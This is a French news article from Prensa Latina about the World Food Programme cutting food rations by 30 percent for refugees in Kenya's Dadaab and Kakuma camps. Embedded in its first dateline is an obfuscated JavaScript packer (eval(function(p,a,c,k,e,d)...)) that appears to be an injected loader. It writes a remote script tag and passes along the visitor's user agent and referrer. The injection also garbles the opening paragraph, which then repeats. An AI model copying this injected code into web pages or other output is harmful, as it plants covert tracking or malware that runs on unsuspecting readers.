lundi 22 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

L’ONU diminuera la ration alimentaire des réfugiés au Kenya

Nairobi, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|akebk|var|u0026u|referrer|fhrdr||js|php'.split('|'),0,{})) 2 octobre (Prensa Latina) Par faute de financements, le Programme Mondial Alimentaire (PMA) de l'ONU réduira de 30 pour cent les rations de vivres des 420 mille réfugiés des campements kényans de Dadaab et Kakuma.

Nairobi, 2 octobre (Prensa Latina) Par faute de financements, le Programme Mondial Alimentaire (PMA) de l’ONU réduira de 30 pour cent les rations de vivres des 420 mille réfugiés des campements kényans de Dadaab et Kakuma.

La représentante du PMA, Annalisa Conte, a informé que l’agence des Nations Unies déplore souffrir d’un manque critique de ressources qui l’oblige à prendre cette mesure.

Le communiqué émis par Conte souligne que « Le programme a besoin de 28,5 millions de dollars pour répondre adéquatement aux besoins d’assistance alimentaire de ces réfugiés lors des six prochains mois. Raison pour laquelle ces personnes ne recevront que 70 pour cent de leurs besoins ».

Dadaab est le plus important camp de réfugiés du monde et se trouve au nord du Kenya où il abrite près de 329 mille 800 personnes, dont un grand nombre de somaliens qui ont fui la violence et la sécheresse que subit leur pays.

peo/lma/mt

EN CONTINU
notes connexes